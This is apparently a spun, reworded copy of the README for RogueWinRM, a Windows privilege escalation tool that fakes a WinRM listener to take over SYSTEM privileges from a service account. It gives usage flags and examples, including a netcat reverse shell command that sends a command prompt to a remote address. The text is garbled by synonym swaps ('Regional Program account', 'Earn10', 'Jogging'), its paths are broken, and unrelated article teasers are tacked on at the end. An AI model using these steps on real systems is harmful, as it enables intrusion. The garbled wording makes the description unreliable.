RogueWinRM is a regional privilege escalation exploit that enables to escalate from a Service account (with SeImpersonatePrivilege) to Regional Program account if WinRM assistance is not operating (default on Earn10 but NOT on Windows Server 2019).
Briefly, it will hear for incoming connection on port 5985 faking a genuine WinRM support.
It is really just a negligible webserver that will consider to negotiate an NTLM authentication with any service that are making an attempt to hook up on that port.
Then the BITS assistance (operating as Community System) is triggered and it will test to authenticate to our rogue listener. Once authenticated to our rogue listener, we are equipped to impersonate the Nearby Process user spawning an arbitrary system with those privileges.
You can discover a whole technological description of this vulnerability at this url –> https://decoder.cloud/2019/12/06/we-considered-they-were being-potatoes-but-they-ended up-beans/
Use
RogueWinRM
Obligatory args:
-p : method to launch
Optional args:
-a : command line argument to pass to system (default NULL)
-l : listening port (default 5985 WinRM)
-d : Enable Debugging output
Examples
Jogging an interactive cmd:
RogueWinRM.exe -p C:windowssystem32cmd.exe
Operating netcat reverse shell:
RogueWinRM.exe -p C:windowstempnc64.exe -a "10...1 3001 -e cmd"
Authors
Write a AI detection pass, persuasive, cickable, catchy, well structured and seo optimized article with… Read More
AI Will Make Human Art More Valuable AI models are increasing in popularity and value… Read More
UK Set to Announce Ban on TikTok on Government Smartphones: Report Following in the footsteps… Read More
How ChatGPT and Generative AI Could Change the Way We Travel The travel industry is… Read More
The curious case of Pluto! Is it a dwarf planet, comet or an asteroid? This… Read More
A Spy Wants to Connect with You on LinkedIn: How to Spot and Avoid Fake… Read More
Leave a Comment